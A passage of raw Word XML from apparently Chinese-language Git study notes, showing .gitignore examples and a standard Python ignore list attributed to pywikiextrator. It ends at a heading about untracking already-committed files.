        <w:t>/TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED5FA2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>忽略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">build/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>目录下的所有文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB999E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>build/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671133F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>会忽略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> doc/notes.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>但不包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> doc/server/arch.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC315A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>doc/.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE1EE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF3D875" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C3F337" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335688C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>以下为pywikiextrator的.gitignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA279E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5E8C65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.py[cod]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D0123" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4061A50F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># C extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D060856" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7ACDEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613A81D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># Packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9319DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.egg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52537B63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.egg-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B171D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D68F5A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA522D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eggs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00369921" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D469A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA63F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C95FFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sdist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873FFF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>develop-eggs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E9FCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.installed.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4B6C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D44164" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD580A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A87791B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Installer logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DFC37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pip-log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6701AA09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E5163A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Unit test / coverage reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00928BB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11057F89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.tox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA5EC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nosetests.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12129328" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA430B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Translations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDFA77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.mo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAE93F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366EC09F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Mr Developer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E06A74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mr.developer.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960C40D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DED62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.pydevproject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48988717" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8369EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/docs/_build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328398E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D3CF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.iml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68BD47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033215DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.travis-solo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D037E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>G*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFBD490" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116765A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.mdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C70C98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703B225F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A279CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[._]*.s[a-w][a-z]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F272E26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[._]s[a-w][a-z]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2233A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*.un~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423A0CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Session.vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC8EDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.netrwhist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961D5E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7957F766" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBB0741" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2812248D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc159779511"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重写了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是想删除已提交但想忽略的内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="5B110A31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
